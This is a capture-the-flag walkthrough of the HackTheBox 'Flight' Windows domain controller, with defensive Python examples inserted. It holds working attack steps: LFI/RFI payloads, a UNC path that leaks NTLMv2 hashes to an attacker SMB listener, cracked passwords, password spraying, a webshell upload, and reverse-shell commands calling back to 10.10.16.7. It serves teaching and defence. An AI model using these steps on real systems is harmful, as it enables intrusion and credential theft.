HTB - Flight

Machine Info
Flight is a hard Windows machine that starts with a website with two different virtual hosts. One of them is vulnerable to LFI and allows an attacker to retrieve an NTLM hash. Once cracked, the obtained clear-text password will be sprayed across a list of valid usernames to discover a password re-use scenario. Once the attacker has SMB access as the user s.moon, he is able to write to a share that gets accessed by other users. Certain files can be used to steal the NTLMv2 hash of the users that access the share. Once the second hash is cracked, the attacker will be able to write a reverse shell in a share that hosts the web files and gain a shell on the box as a low-privileged user. Having credentials for the user c.bum, it will be possible to gain a shell as this user, which will allow the attacker to write an aspx web shell on a web site configured to listen only on localhost. Once the attacker has command execution as the Microsoft Virtual Account, he is able to run Rubeus to get a ticket for the machine account that can be used to perform a DCSync attack, ultimately obtaining the hashes for the Administrator user, or abuse the SeImpersonatePrivilege privilege to gain the SYSTEM account.
Enumeration
Scope
IP Address: 10.10.11.187
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
88/tcp open kerberos-sec syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
389/tcp open ldap syn-ack
445/tcp open microsoft-ds syn-ack
464/tcp open kpasswd5 syn-ack
593/tcp open http-rpc-epmap syn-ack
636/tcp open ldapssl syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-20 10:26:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-20T10:28:25
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 7h00m03s
* Open ports:53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389
* UDP open ports: 53,389
* Services: DNS - HTTP - KERBEROS - RPC - SMB - LDAP - LDAPS - winRM
* Versions: Apache httpd 2.4.52 - PHP/8.1.1
* Important notes: Domain: flight.htb
Since there is a web server listening on port 80, I started by collecting subdomains of the web app.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt:FUZZ -u http://$ip/ -H "Host: FUZZ.flight.htb" -fs 7069
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 113ms]
Update the /etc/hosts file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo sh -c "echo '$ip flight.htb school.flight.htb' >> /etc/hosts"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ tail -n1 /etc/hosts
10.10.11.187 flight.htb school.flight.ht
DNS Enumeration
I tried a DNS zone transfer, but got nothing.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr flight.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ dig axfr school.flight.htb @$ip
; <<>> DiG 9.19.19-1-Debian <<>> axfr school.flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.
RPC Enumeration
Anonymous access over RPC was denied.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ rpcclient -U '%' $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
Nothing from SMB either.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ smbclient -N -L //$ip
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.187 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\:
SMB 10.10.11.187 445 G0 [-] Error enumerating shares: STATUS_ACCESS_DENIED
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Rebound]
└─$ crackmapexec smb $ip -u 'guest' -p '' --shares
SMB 10.10.11.187 445 G0 [-] flight.htb\guest: STATUS_ACCOUNT_DISABLED
KERBEROS Enumeration
I started kerbrute to get at least some valid usernames, but with no luck.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/MultiMasters]
└─$ kerbrute userenum --dc $ip -d flight.htb -t 100 /usr/share/wordlists/seclists/Usernames/jsmith.txt
2024/07/19 23:40:57 > Done! Tested 48705 usernames (0 valid) in 51.969 seconds
LDAP Enumeration
No information from LDAP without an authenticated bind.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ldapsearch -H ldap://$ip -x -b "DC=FLIGHT,DC=HTB" -s sub '*'
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4563
HTTP Enumeration
http://10.10.11.187/

It's a static website, and directory fuzzing found nothing, so I went on to explore the school.flight.htb subdomain I found before.
http://school.flight.htb/

Shell as svc_apache
The web app includes files through the view parameter: http://school.flight.htb/index.php?view=about.html
I tried to include a local file with these payloads, but without luck:
C:\Windows\System32\drivers\etc\hosts
..\..\..\Windows\System32\drivers\etc\hosts
./../../../Windows/System32/drivers/etc/hosts
However, C:/windows/system32/drivers/etc/hosts worked.
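The payloads above behave differently because a filter that only looks for ".." and backslashes says nothing about a drive-qualified path written with forward slashes. The following is an added example, not code from the writeup or from the school.flight.htb application (its index.php is not shown here): blocklist_allows is my assumption of a filter that would produce exactly the results observed above, and confine_to_root is the hardened check, using Python's ntpath module so that Windows path semantics apply even when it runs on Linux. The web root is taken from the shell prompt later in the writeup, and the fifth payload is the UNC path used in the next step.

```python
import ntpath

# Web root as seen in the writeup's later PowerShell prompt (C:\xampp\htdocs\school.flight.htb).
WEB_ROOT = r"C:\xampp\htdocs\school.flight.htb"

# The values tried against index.php?view= in the writeup; the last two were the ones that
# "worked" (a local file read, then an outbound SMB connection to the attacker's listener).
PAYLOADS = [
    r"C:\Windows\System32\drivers\etc\hosts",
    r"..\..\..\Windows\System32\drivers\etc\hosts",
    "./../../../Windows/System32/drivers/etc/hosts",
    "C:/windows/system32/drivers/etc/hosts",
    "///10.10.16.7/share",
]


def blocklist_allows(view: str) -> bool:
    """Hypothetical blocklist (an assumption, not the real index.php) that reproduces the
    observed behaviour: it rejects '..' and backslashes, so an absolute path and a UNC path
    written with forward slashes both slip through."""
    return ".." not in view and "\\" not in view


def confine_to_root(view: str, root: str = WEB_ROOT):
    """Hardened resolution for an include parameter.

    Refuses anything that is already rooted (leading separator, drive letter or UNC prefix),
    then joins and normalises with Windows semantics and requires the result to stay under
    the web root. Returns the resolved path, or None when the request must be refused."""
    if view[:1] in ("/", "\\") or ntpath.splitdrive(view)[0]:
        return None
    candidate = ntpath.normpath(ntpath.join(root, view))
    root_norm = ntpath.normpath(root)
    # Case-insensitive prefix test with a trailing separator, so that a sibling directory
    # whose name merely starts with the root's name is not mistaken for a child of it.
    if not candidate.lower().startswith(root_norm.lower() + ntpath.sep):
        return None
    return candidate


def evaluate(payloads=PAYLOADS):
    """Side-by-side verdicts: {payload: (blocklist verdict, confined path or None)}."""
    return {p: (blocklist_allows(p), confine_to_root(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (weak, strong) in evaluate().items():
        verdict = "ALLOW" if weak else "deny"
        print(f"{payload!r:50} blocklist={verdict:5} confined={strong}")
```

Only the two forward-slash payloads pass the blocklist, matching what the writeup observed, while confine_to_root refuses all five and still serves a legitimate view such as about.html.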

I thought it was worth testing for RFI as well, so I started a local SMB server and visited /index.php?view=///10.10.16.7/share, which gave me an NTLMv2 hash:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .
[*] Incoming connection (10.10.11.187,49850)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
The hash was cracked successfully
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13
Session..........: hashcat
Status...........: Cracked
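Before cracking, the NTLMv2 response itself is worth reading: the blob after the NTProofStr carries the client's timestamp, its nonce and the AV_PAIR list the server sent in its challenge, which the client echoes back. For a defender triaging a capture like this, it tells you which listener the account actually authenticated to. The following is an added example, not part of the writeup or of impacket; it parses the svc_apache line printed above according to the MS-NLMP layout (fixed 28-byte header, then AV pairs with identifiers 1 to 10, FILETIME timestamps) and needs nothing beyond the standard library. No names other than those in the captured line are assumed.

```python
import struct
from datetime import datetime, timedelta, timezone

# The svc_apache capture exactly as impacket-smbserver printed it in the writeup above
# (hashcat -m 5600 layout: user::domain:server_challenge:NTProofStr:blob).
CAPTURED = (
    "svc_apache::flight:aaaaaaaaaaaaaaaa:d3295ba0f2fcade30868dfa24d5af590:"
    "01010000000000000045524d5adada0188255a12d3e6c00100000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e0068004300070008000045524d5adada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000"
)

# MsvAv* identifiers from MS-NLMP section 2.2.2.1.
AV_NAMES = {
    1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName", 4: "DnsDomainName",
    5: "DnsTreeName", 6: "Flags", 7: "Timestamp", 8: "SingleHost", 9: "TargetName",
    10: "ChannelBindings",
}
STRING_AVS = {1, 2, 3, 4, 5, 9}   # UTF-16LE strings


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)


def parse_ntlmv2_response(blob: bytes) -> dict:
    """Decode the NTLMv2_CLIENT_CHALLENGE ("blob") that follows the NTProofStr."""
    if blob[0] != 1 or blob[1] != 1:
        raise ValueError("not an NTLMv2 client challenge (RespType and HiRespType must be 1)")
    (timestamp,) = struct.unpack_from("<Q", blob, 8)   # set by the client's clock
    client_challenge = blob[16:24]                       # the client's 8-byte nonce
    av_pairs, offset = {}, 28                            # AV_PAIR list starts at offset 28
    while offset + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, offset)
        offset += 4
        value = blob[offset:offset + av_len]
        offset += av_len
        if av_id == 0:                                   # MsvAvEOL terminates the list
            break
        if av_id in STRING_AVS:
            value = value.decode("utf-16-le")
        elif av_id == 7:
            value = filetime_to_datetime(struct.unpack("<Q", value)[0])
        elif av_id == 6:
            (value,) = struct.unpack("<I", value)        # bit 0x2: a MIC is present
        else:
            value = value.hex()
        av_pairs[AV_NAMES.get(av_id, f"AvId{av_id}")] = value
    return {
        "timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "av_pairs": av_pairs,
    }


def parse_hashcat_line(line: str) -> dict:
    """Split a hashcat -m 5600 line; a trailing field (the cracked password) is optional."""
    fields = line.strip().split(":")
    user, _, domain, server_challenge, nt_proof_str, blob_hex = fields[:6]
    info = {
        "user": user, "domain": domain, "server_challenge": server_challenge,
        "nt_proof_str": nt_proof_str, "password": ":".join(fields[6:]) or None,
    }
    info.update(parse_ntlmv2_response(bytes.fromhex(blob_hex)))
    return info


if __name__ == "__main__":
    parsed = parse_hashcat_line(CAPTURED)
    print(f"{parsed['domain']}\\{parsed['user']} authenticated at {parsed['timestamp']:%Y-%m-%d %H:%M:%S %Z}")
    for name, value in parsed["av_pairs"].items():
        print(f"  {name:16} {value}")
```

Two of the decoded fields are the ones a blue team would look at: the NetBIOS and DNS names the listener advertised (here two eight-letter strings that match no host in flight.htb) and the TargetName, cifs/10.10.16.7, a bare IP address rather than a domain-joined hostname. A DC authenticating to a server like that is a strong indicator of a rogue SMB listener, independent of whether the hash is ever cracked.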
After getting valid credentials, I will do the following:
* Explore the shares for interesting files with the spider_plus module of CME
* Enumerate the domain with rpcclient & bloodhound.py
bloodhound.py
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ bloodhound-python -u 'svc_apache' -p 'S@Ss!K@*t13' -ns $ip -d flight.htb -c all --zip
<snip>
INFO: Done in 00M 14S
INFO: Compressing output into 20240720003141_bloodhound.zip
Use rpcclient to get the domain users
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rpcclient -U 'svc_apache%S@Ss!K@*t13' $ip -c enumdomusers | tee -a users.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[S.Moon] rid:[0x642]
user:[R.Cold] rid:[0x643]
user:[G.Lors] rid:[0x644]
user:[L.Kein] rid:[0x645]
user:[M.Gold] rid:[0x646]
user:[C.Bum] rid:[0x647]
user:[W.Walker] rid:[0x648]
user:[I.Francis] rid:[0x649]
user:[D.Truff] rid:[0x64a]
user:[V.Stevens] rid:[0x64b]
user:[svc_apache] rid:[0x64c]
user:[O.Possum] rid:[0x64d]
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ cat users.txt | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
S.Moon
R.Cold
G.Lors
L.Kein
M.Gold
C.Bum
W.Walker
I.Francis
D.Truff
V.Stevens
svc_apache
O.Possum
I tried ASREPRoasting against these users, but no luck :(
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-GetNPUsers FLIGHT.HTB/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
<snip>
[-] User C.Bum doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User W.Walker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User I.Francis doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
I then sprayed the password of the user svc_apache to see if it was reused by another user.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u users.lst -p 'S@Ss!K@*t13' --continue-on-success
SMB 10.10.11.187 445 G0 [*] Windows 10 / Server 2019 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\R.Cold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\G.Lors:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\L.Kein:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\M.Gold:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\C.Bum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\W.Walker:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\I.Francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\D.Truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\V.Stevens:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [-] flight.htb\O.Possum:S@Ss!K@*t13 STATUS_LOGON_FAILURE
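On the DC this spray shows up as a burst of 4625 logon failures from one source, each for a different account, with a 4624 success in the same burst for every account where the password was reused. The following detection logic is an added example, not from the writeup. The events are constructed to mirror the crackmapexec output above: the account list and the two hits come from the page, while the timestamps, the subset of event fields and the 10.10.11.50 noise source are invented for the example. The detector flags any source that fails against at least five distinct accounts within five minutes and reports the successes from the same source in that window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security-log logon events shaped the way the spray above would
# appear on the DC. Field names follow the Windows event schema; values are invented except
# for the account names and the two password-reuse hits, which come from the writeup.
BASE_TIME = datetime(2024, 7, 20, 0, 35, 0)
SPRAYED = ["S.Moon", "R.Cold", "G.Lors", "L.Kein", "M.Gold", "C.Bum", "W.Walker",
           "I.Francis", "D.Truff", "V.Stevens", "svc_apache", "O.Possum"]
REUSED = {"S.Moon", "svc_apache"}          # the two [+] lines in the crackmapexec output


def _logon_event(seconds, user, success, ip="10.10.16.7"):
    """Build one 4624 (success) or 4625 (failure) record with the fields the detector uses."""
    return {
        "EventID": 4624 if success else 4625,
        "TimeCreated": BASE_TIME + timedelta(seconds=seconds),
        "TargetUserName": user,
        "IpAddress": ip,
        "LogonType": 3,                                   # network logon, as SMB auth produces
        "SubStatus": None if success else "0xC000006A",   # wrong password
    }


SAMPLE_EVENTS = [_logon_event(i, user, user in REUSED) for i, user in enumerate(SPRAYED)]
# Benign noise the detector must ignore: an interactive admin logon on the DC itself and one
# isolated failure from a different (constructed) workstation address.
SAMPLE_EVENTS += [
    {**_logon_event(40, "Administrator", True, ip="10.10.11.187"), "LogonType": 2},
    _logon_event(50, "M.Gold", False, ip="10.10.11.50"),
]


def detect_password_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag a source that fails authentication for at least `min_accounts` distinct accounts
    inside one `window`. Any 4624 from the same source in that window is reported too: that
    is the password-reuse hit the attacker was looking for, and the account to reset first."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["EventID"] in (4624, 4625) and ev["LogonType"] == 3:
            by_source[ev["IpAddress"]].append(ev)

    alerts = []
    for source, evs in by_source.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for start in evs:
            end = start["TimeCreated"] + window
            in_window = [e for e in evs if start["TimeCreated"] <= e["TimeCreated"] <= end]
            failed = {e["TargetUserName"] for e in in_window if e["EventID"] == 4625}
            if len(failed) < min_accounts:
                continue
            succeeded = {e["TargetUserName"] for e in in_window if e["EventID"] == 4624}
            alerts.append({
                "source": source,
                "first_seen": in_window[0]["TimeCreated"],
                "last_seen": in_window[-1]["TimeCreated"],
                "failed_accounts": sorted(failed),
                "succeeded_accounts": sorted(succeeded),
            })
            break   # one alert per source; the window already holds the evidence
    return alerts


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(f"spray from {alert['source']}: {len(alert['failed_accounts'])} accounts failed, "
              f"reuse hits: {', '.join(alert['succeeded_accounts']) or 'none'}")
```

The distinguishing feature of a spray, as opposed to a brute force against one account, is the breadth: many accounts, one attempt each, from a single source in a short window. That is why the detector keys on distinct target accounts rather than on the failure count, and why the threshold stays below the lockout policy an attacker is deliberately trying to avoid.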
I found no interesting files when enumerating the shares as svc_apache, so I tried to enumerate them as S.Moon.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u 'svc_apache' -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\svc_apache:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
S.Moon has write access to the Shared folder, so I can put a malicious .scf or .lnk file there to capture the NTLMv2 hash of any user who browses that share.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ crackmapexec smb $ip -u S.Moon -p 'S@Ss!K@*t13' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
SMB 10.10.11.187 445 G0 [+] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ
I mounted the Shared folder on my Kali machine for easier exploring.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\Shared" ./shared -o "username=S.Moon,password=S@Ss\!K@*t13"
I tried to drop several file types, but it seems a group policy blocks specific file extensions:
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.scf
touch: cannot touch 'file.scf': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.lnk
touch: cannot touch 'file.lnk': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ico
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.exe
touch: cannot touch 'file.exe': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.bat
touch: cannot touch 'file.bat': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.dll
touch: cannot touch 'file.dll': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.txt
touch: cannot touch 'file.txt': Permission denied
┌──(root㉿kali)-[/home/…/HTB/machines/Flight/shared]
└─# touch file.ini
Shell as c.bum
.ico & .ini worked for me, so I used this post to create the .ini file, as I didn't know the structure it should have.

There is also a tool that can create multiple files that can be dropped:
https://github.com/Greenwolf/ntlm_theft
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ impacket-smbserver -smb2support share .
c.bum::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ hashcat -m 5600 ntlm.hash /usr/share/wordlists/rockyou.txt
C.BUM::flight.htb:aaaaaaaaaaaaaaaa:0839d9896fae8cd052b24e128b30c06e:010100000000000000e1714c63dada01369d55e739f507ca00000000010010007a0074005a0042007800590073005100030010007a0074005a00420078005900730051000200100055004c0053005a005a004e00680043000400100055004c0053005a005a004e00680043000700080000e1714c63dada0106000400020000000800300030000000000000000000000000300000bb9b7a2840c5d12691b92a00e376fcb445e67b65c747213c7c0d8520d01bc24f0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:Tikkycoll_431012284
Session..........: hashcat
Status...........: Cracked
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284'
SMB 10.10.11.187 445 G0 [+] flight.htb\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 Node C.BUM@FLIGHT.HTB successfully set as owned in BloodHound
C.BUM is a member of the web development group, so I think it has write permission on the Web folder we saw before.

As I guessed :)
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ nxc smb $ip -u 'C.BUM' -p 'Tikkycoll_431012284' --shares
SMB 10.10.11.187 445 G0 [+] flight.htb\C.BUM:Tikkycoll_431012284
SMB 10.10.11.187 445 G0 [*] Enumerated shares
SMB 10.10.11.187 445 G0 Share Permissions Remark
SMB 10.10.11.187 445 G0 ----- ----------- ------
SMB 10.10.11.187 445 G0 ADMIN$ Remote Admin
SMB 10.10.11.187 445 G0 C$ Default share
SMB 10.10.11.187 445 G0 IPC$ READ Remote IPC
SMB 10.10.11.187 445 G0 NETLOGON READ Logon server share
SMB 10.10.11.187 445 G0 Shared READ,WRITE
SMB 10.10.11.187 445 G0 SYSVOL READ Logon server share
SMB 10.10.11.187 445 G0 Users READ
SMB 10.10.11.187 445 G0 Web READ,WRITE
I mounted the share as the C.BUM user
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ sudo mount -t cifs "\\\\$ip\\web" ./web -o 'username=C.BUM,password=Tikkycoll_431012284'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ ls -al web
total 4
drwxr-xr-x 2 root root 0 Jul 20 2024 .
drwxrwxr-x 5 kali kali 4096 Jul 20 01:23 ..
drwxr-xr-x 2 root root 0 Jul 20 2024 flight.htb
drwxr-xr-x 2 root root 0 Jul 20 2024 school.flight.htb
I tried to put a .php file there and it worked, so I will try to upload a webshell.
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# touch file.php
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# ls
about.html blog.html file.php home.html images index.php lfi.html styles
┌──(root㉿kali)-[/home/…/machines/Flight/web/school.flight.htb]
└─# cp ..\p0wny.php .
http://school.flight.htb/p0wny.php

The webshell doesn't persist; maybe there is a cleanup script. I will upload nc.exe instead and send a shell back to my Kali machine.

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 50122
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\xampp\htdocs\school.flight.htb>
I also wanted a shell as C.Bum, so I uploaded RunasCs.exe and sent a connection back to my Kali machine.
PS C:\users\Public> .\RunasCs.exe C.BUM Tikkycoll_431012284 Powershell -r 10.10.16.7:8443
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-58a5e$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 2364 created in background.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Flight]
└─$ rlwrap nc -lvnp 8443
